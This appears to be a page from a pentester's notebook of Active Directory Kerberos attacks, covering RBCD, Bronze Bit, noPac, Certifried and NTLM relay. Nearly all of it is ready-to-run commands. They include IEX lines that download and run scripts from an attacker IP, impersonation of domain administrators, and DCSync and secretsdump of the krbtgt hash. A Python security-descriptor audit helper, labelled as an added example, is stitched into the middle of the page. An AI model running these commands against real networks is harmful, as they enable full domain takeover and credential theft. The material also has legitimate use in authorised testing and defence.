Pentester's Promiscuous Notebook

Resource-based Constrained

Last updated 11 months ago

MAQ (Machine Account Quota)

PowerShell (ActiveDirectory module):

PS > Get-ADObject -Identity "DC=megacorp,DC=local" -Properties * | select ms-ds-machineAccountQuota

PowerView:

PV3 > Get-DomainObject -Identity "DC=megacorp,DC=local" | select ms-ds-machineAccountQuota

LDAP:

$ windapsearch --dc 192.168.1.11 -d megacorp.local -u snovvcrash -p 'Passw0rd1!' -m custom --filter '(&(objectClass=domain)(distinguishedName=DC=megacorp,DC=local))' --attrs ms-ds-machineAccountQuota
$ ldeep ldap -d megacorp.local -u snovvcrash -p 'Passw0rd!' -s ldap://192.168.1.11 search '(&(objectClass=domain)(distinguishedName=DC=megacorp,DC=local))' ms-ds-machineAccountQuota

CrackMapExec:

$ cme ldap 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -M MAQ

CVE-2021-34470

RBCD from Windows

Load tools:

PS > IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/powermad.ps1")
PS > IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/powerview4.ps1")

Define credentials for the compromised account with the necessary DACL:

PS > $userWithDaclUsername = 'megacorp.local\snovvcrash'
PS > $userWithDaclPassword = ConvertTo-SecureString 'Qwe123!@#' -AsPlainText -Force
PS > $cred = New-Object System.Management.Automation.PSCredential($userWithDaclUsername, $userWithDaclPassword)

Add a new machine account and configure RBCD on the vulnerable host (DC01), i.e., set its msDS-AllowedToActOnBehalfOfOtherIdentity attribute to a security descriptor that grants full control to the new machine account's SID:

Powermad > New-MachineAccount -MachineAccount fakemachine -Password $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) -Verbose
PV3 > $computerSID = Get-DomainComputer -Identity fakemachine -Properties ObjectSid -Verbose -Credential $cred | select -Expand ObjectSid
PS > $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($computerSID))"
PS > $SDBytes = New-Object byte[] ($SD.BinaryLength)
PS > $SD.GetBinaryForm($SDBytes, 0)
PV3 > Get-DomainComputer DC01.megacorp.local -Verbose -Credential $cred | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$SDBytes} -Verbose -Credential $cred
PS > .\Rubeus.exe hash /domain:megacorp.local /user:fakemachine$ /password:Passw0rd!
FC525C9683E8FE067095BA2DDC971889
PS > .\Rubeus.exe s4u /domain:megacorp.local /user:fakemachine$ /rc4:FC525C9683E8FE067095BA2DDC971889 /impersonateuser:DC01$ /msdsspn:CIFS/DC01.megacorp.local /altservice:host,wsman,ldap,http /ptt

If the ticket cannot be imported or there is no access to the corresponding services, troubleshoot it:

  • Try impersonating different privileged users when requesting the ticket.

  • Try switching from FQDN to NetBIOS name in the /msdsspn parameter (i.e., CIFS/DC01 instead of CIFS/DC01.megacorp.local).

After the ticket has been successfully imported, we can go for filesystem access (CIFS), PSRemoting (WSMAN), DCSync (LDAP) and so on:

PS > klist
# CIFS
PS > cd \\DC01.megacorp.local\c$
PS > ls
PS > c:
# WSMAN
PS > Enter-PSSession -ComputerName DC01.megacorp.local
PS > exit
# LDAP
PS > ...DCSync...

Clean up:

PV3 > Get-DomainComputer DC01.megacorp.local -Verbose -Credential $cred | Set-DomainObject -Clear 'msDS-AllowedToActOnBehalfOfOtherIdentity' -Verbose -Credential $cred
Powermad > Remove-MachineAccount -MachineAccount fakemachine
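The byte array written to msDS-AllowedToActOnBehalfOfOtherIdentity above is a self-relative security descriptor. As an added example (not code from the notebook or from the tools it references), the Python below decodes such a value into the trustee SIDs and access masks it grants, which is also what to inspect when verifying the attribute is empty after clean-up; build_rbcd_sd and the SIDs in the test are constructed input mirroring the SDDL string above.

```python
import struct

# Access mask for the SDDL rights string CCDCLCSWRPWPDTLOCRSDRCWDWO used above
# (CC|DC|LC|SW|RP|WP|DT|LO|CR = 0x1FF, SD|RC|WD|WO = 0xF0000): full control.
FULL_CONTROL = 0x000F01FF
SE_DACL_PRESENT = 0x0004
ACCESS_ALLOWED_ACE_TYPE = 0


def sid_to_bytes(sid):
    """Serialize 'S-1-5-21-...' into the binary SID layout used inside ACEs."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID string: %r" % sid)
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([1, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf, off):
    """Parse a binary SID at offset off; returns (sid_string, consumed_bytes)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    text = "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs)
    return text, 8 + 4 * count


def build_rbcd_sd(trustee_sids):
    """Constructed test input: a self-relative SD equivalent to
    O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<sid>) for each trustee."""
    aces = b""
    for sid in trustee_sids:
        sid_b = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0,
                            8 + len(sid_b), FULL_CONTROL) + sid_b
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(trustee_sids), 0) + aces
    owner = sid_to_bytes("S-1-5-32-544")  # BA = BUILTIN\Administrators
    # Header: revision, sbz, control, then owner/group/sacl/dacl offsets.
    header = struct.pack("<BBHIIII", 1, 0, 0x8000 | SE_DACL_PRESENT,
                         20, 0, 0, 20 + len(owner))
    return header + owner + acl


def rbcd_trustees(sd):
    """Return [(sid, access_mask)] for every allow ACE in the DACL of an
    msDS-AllowedToActOnBehalfOfOtherIdentity value; [] when nobody may delegate."""
    if len(sd) < 20:
        return []
    rev, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if rev != 1 or not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    pos, found = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            found.append((sid_from_bytes(sd, pos + 8)[0], mask))
        pos += ace_size  # skip unknown ACE types by their declared size
    return found


def unexpected_trustees(sd, approved_sids):
    """Audit helper: SIDs allowed to delegate that are not on an approved list."""
    return [sid for sid, _ in rbcd_trustees(sd) if sid not in approved_sids]
```

Feed the raw attribute bytes (e.g. from the Get-ADComputer -Properties output) to rbcd_trustees; an empty list after clean-up confirms the ACE was actually removed.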

PowerView 4.0

Configure RBCD on the vulnerable host (DC01):

PV4 > Set-DomainRBCD DC01 -DelegateFrom fakemachine -Verbose

Clean up:

PV4 > Set-DomainRBCD DC01 -Clear -Verbose

RBCD from Linux

Add new machine account:

$ addcomputer.py -computer-name 'fakemachine' -computer-pass 'Passw0rd!' -dc-ip 192.168.1.11 -dc-host DC02.megacorp.local megacorp.local/snovvcrash:'Qwe123!@#'

Ask TGS for LDAP:

$ getST.py -spn ldap/DC01.megacorp.local -impersonate 'DC01' -dc-ip 192.168.1.11 megacorp.local/fakemachine:'Passw0rd!'

rbcd-attack

Configure RBCD on the vulnerable host (DC01):

$ python3 rbcd.py -f fakemachine -t DC01 -dc-ip 192.168.1.11 megacorp.local/snovvcrash:'Passw0rd!'
$ python3 rbcd.py -f fakemachine -t DC01 -dc-ip 192.168.1.11 megacorp.local/'MEGACORP\SRV01$' -hashes :fc525c9683e8fe067095ba2ddc971889

rbcd_permissions

Configure RBCD on the vulnerable host (DC01) via PtH:

$ python3 rbcd.py -t 'CN=dc01,OU=Domain Controllers,DC=megacorp,DC=local' -d megacorp.local -c 'CN=fakemachine,CN=Computers,DC=megacorp,DC=local' -u snovvcrash -H fc525c9683e8fe067095ba2ddc971889:fc525c9683e8fe067095ba2ddc971889 -l 192.168.1.11

impacket-rbcd

$ rbcd.py -delegate-from 'FAKEMACHINE$' -delegate-to 'SRV01$' -dc-ip 192.168.1.11 -k -no-pass -action {read,write,remove,flush} megacorp.local/snovvcrash

Bronze Bit

CVE-2020-17049

PS > Get-KerberosAESKey -Password 'Passw0rd!' -Salt MEGACORP.LOCALfakemachine
AES128 Key: 01C7B89A74F7AEC1007DED2F3DE0A815
AES256 Key: 211E8E3134ED797B0A2BF6C36D1A966B3BED2B24E4AAA9ECEED23D0ABF659E98

Or with Mimikatz:

mimikatz # kerberos::hash /domain:megacorp.local /user:fakemachine /password:Passw0rd!
        * rc4_hmac_nt       fc525c9683e8fe067095ba2ddc971889
        * aes128_hmac       01c7b89a74f7aec1007ded2f3de0a815
        * aes256_hmac       211e8e3134ed797b0a2bf6c36d1a966b3bed2b24e4aaa9eceed23d0abf659e98
        * des_cbc_md5       621a91461f1adffe

Now you can impersonate a protected user:

$ addcomputer.py -computer-name fakemachine -computer-pass 'Passw0rd!' -dc-ip 192.168.1.11 -dc-host DC01.megacorp.local megacorp.local/snovvcrash:'Qwe123!@#'
$ python3 rbcd.py -t 'CN=dc01,OU=Domain Controllers,DC=megacorp,DC=local' -d megacorp.local -c 'CN=fakemachine,CN=Computers,DC=megacorp,DC=local' -u snovvcrash -H 79bfd1ab35c67c19715aea7f06da66ee:79bfd1ab35c67c19715aea7f06da66ee -l 192.168.1.11
$ getST.py -spn ldap/DC01.megacorp.local -impersonate 'administrator' -dc-ip 192.168.1.11 megacorp.local/fakemachine -hashes :fc525c9683e8fe067095ba2ddc971889 -aesKey 211e8e3134ed797b0a2bf6c36d1a966b3bed2b24e4aaa9eceed23d0abf659e98 -force-forwardable
$ secretsdump.py DC01.megacorp.local -just-dc-user 'MEGACORP\krbtgt' -dc-ip 192.168.1.11 -no-pass -k

Metasploit

RBCD with UPNs

The user j.doe is added to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the SRV01 machine account:

PS > Set-ADComputer SRV01 -PrincipalsAllowedToDelegateToAccount j.doe

Request a regular TGT for j.doe:

PS > .\Rubeus.exe asktgt /user:j.doe /rc4:fc525c9683e8fe067095ba2ddc971889 /nowrap

Request a U2U ticket, providing the TGT in both the /ticket and /tgs options and specifying the user to impersonate in the /targetuser option (this is an S4U2self request):

PS > .\Rubeus.exe asktgs /u2u /targetuser:<USER_TO_IMPERSONATE> /nowrap /ticket:<TGT> /tgs:<TGT>

Obtain a hex view of the current TGT session key (RC4 HMAC):

$ python3 -c 'import binascii,base64;print(binascii.hexlify(base64.b64decode("<TGT_SESSION_KEY_B64>")).decode())'

Set j.doe's NT hash to the hexlified TGT session key:

$ smbpasswd.py megacorp.local/j.doe:'Passw0rd!'@DC01.megacorp.local -newhashes :<TGT_SESSION_KEY_HEX> -altuser MEGACORP/snovvcrash -altpass 'Passw0rd123!'

Go for the S4U attack, providing the initial TGT in the /ticket option and the forwardable TGS (obtained from the U2U request) in the /tgs option (only the S4U2proxy part is performed):

PS > .\Rubeus.exe s4u /msdsspn:host/SRV01.megacorp.local /altservice:http /ticket:<TGT> /tgs:<TGS> /createnetonly:C:\Windows\System32\cmd.exe /show

Automation

PS > .\Rubeus.exe s4u /u2u /user:j.doe /rc4:fc525c9683e8fe067095ba2ddc971889 /impersonateuser:administrator /msdsspn:host/SRV01.megacorp.local /altservice:http /createnetonly:C:\Windows\System32\cmd.exe /show

RBCD for PrivEsc

$ getST.py megacorp.local/'PC01$' -hashes :`pypykatz crypto nt 'Passw0rd!'` -dc-ip 192.168.1.11 -impersonate administrator -altservice CIFS/PC01.megacorp.local -self

sAMAccountName Spoofing (noPac)

CVE-2021-42278, CVE-2021-42287

Check

Look at the size of the returned TGT. If the DC is not vulnerable, the TGT will contain the PAC and be noticeably larger:

PS > .\Rubeus.exe asktgt /domain:megacorp.local /dc:DC01.megacorp.local /user:snovvcrash /password:Passw0rd! /nopac /nowrap
$ cme smb 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -M nopac

Exploit

# create a new machine account
PM > New-MachineAccount -Domain megacorp.local -DomainController DC01.megacorp.local -MachineAccount FakeMachine -Password $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) -Verbose
# clear SPNs
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Clear servicePrincipalName -Verbose
# change fake machine's sAMAccountName
PM > Set-MachineAccountAttribute -MachineAccount FakeMachine -Value DC01 -Attribute sAMAccountName -Verbose
# request TGT
PS > .\Rubeus.exe asktgt /domain:megacorp.local /dc:DC01.megacorp.local /user:DC01 /password:Passw0rd! /nowrap
# change fake machine's sAMAccountName once again
PM > Set-MachineAccountAttribute -MachineAccount FakeMachine -Value FakeMachine -Attribute sAMAccountName -Verbose
# request S4U2self
PS > .\Rubeus.exe s4u /domain:megacorp.local /dc:DC01.megacorp.local /altservice:LDAP/DC01.megacorp.local /impersonateuser:Administrator /self /ptt /ticket:<BASE64_TGT>
# fire DCSync
PS > .\mimikatz.exe "lsadump::dcsync /domain:megacorp.local /dc:DC01.megacorp.local /user:MEGACORP\krbtgt" "exit"

Manually with Impacket:

# create a new machine account
$ addcomputer.py -computer-name FakeMachine -computer-pass 'Passw0rd1!' -dc-host DC01.megacorp.local -dc-ip 192.168.1.11 megacorp.local/snovvcrash:'Passw0rd2!'
# clear SPNs
$ addspn.py -u 'megacorp.local\snovvcrash' -p 'Passw0rd2!' -t 'FakeMachine$' -c DC01
# change fake machine's sAMAccountName
$ renameMachine.py megacorp.local/snovvcrash:'Passw0rd2!' -dc-ip 192.168.1.11 -current-name 'FakeMachine$' -new-name DC01
# request TGT
$ getTGT.py megacorp.local/DC01:'Passw0rd1!' -dc-ip 192.168.1.11
# change fake machine's sAMAccountName once again
$ renameMachine.py megacorp.local/snovvcrash:'Passw0rd2!' -dc-ip 192.168.1.11 -current-name DC01 -new-name 'FakeMachine$'
# request S4U2self
$ KRB5CCNAME=DC01.ccache getST.py -spn LDAP/DC01.megacorp.local -altservice LDAP/DC01.megacorp.local megacorp.local/DC01 -k -no-pass -dc-ip 192.168.1.11 -impersonate administrator -self
# fire DCSync
$ KRB5CCNAME=administrator.ccache secretsdump.py -k -no-pass DC01.megacorp.local -just-dc-user 'MEGACORP\krbtgt'

Using noPac:

# creating a computer account
$ python3 noPac.py megacorp.local/snovvcrash:'Passw0rd123!' -dc-host DC01 -dc-ip 192.168.1.11 -target-name 'FakeMachine1$' -use-ldap -dump -just-dc-ntlm
# providing an existing (owned) computer account creds
$ python3 noPac.py megacorp.local/snovvcrash:'Passw0rd123!' -dc-host DC01 -dc-ip 192.168.1.11 --impersonate administrator -no-add -target-name 'FakeMachine2$' -old-hash :fc525c9683e8fe067095ba2ddc971889

dNSHostName Spoofing (Certifried)

CVE-2022-26923

mitm6 + WPAD + LDAPS NTLM Relay + RBCD

$ ntlmrelayx.py -t ldaps://DC01.megacorp.local --delegate-access -wh attacker-wpad --no-smb-server --no-wcf-server --no-raw-server --no-dump --no-da --no-acl --no-validate-privs [-debug]
$ sudo mitm6 -i eth0 -d megacorp.local --ignore-nofqdn

WebDav + LDAPS NTLM Relay + RBCD

$ cme smb 192.168.1.0/24 -u snovvcrash -p 'Passw0rd!' -M webdav
$ ntlmrelayx.py -t ldaps://DC01.megacorp.local --delegate-access [--escalate-user 'PWNED-MACHINE$'] --no-smb-server --no-wcf-server --no-raw-server --no-dump --no-da --no-acl --no-validate-privs
$ sudo ./Responder.py -I eth0 -wd -P -v
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@80/test.txt VICTIM.megacorp.local
$ getST.py -spn cifs/VICTIM.megacorp.local MEGACORP/'PWNED-MACHINE$' -dc-ip 192.168.1.11 -hashes :fc525c9683e8fe067095ba2ddc971889 -impersonate administrator

Clean Up

PS > Get-ADComputer -Identity FakeMachine | Remove-ADComputer -Confirm:$False
PS > Get-ADComputer -Identity SRV01 -Properties * | select -Expand msds-allowedToActOnBehalfOfOtherIdentity
PS > Get-ADComputer -Identity SRV01 | Set-ADComputer -Clear msds-allowedToActOnBehalfOfOtherIdentity

Ask TGS for CIFS and also inject potentially useful service names into the ticket (sname field in TGS-REQ):

Calculate Kerberos keys for the fake machine account with Get-KerberosAESKey.

From Linux systems, Impacket can be used to operate the technique.

The steps detailed on The Hacker Recipes can be followed.
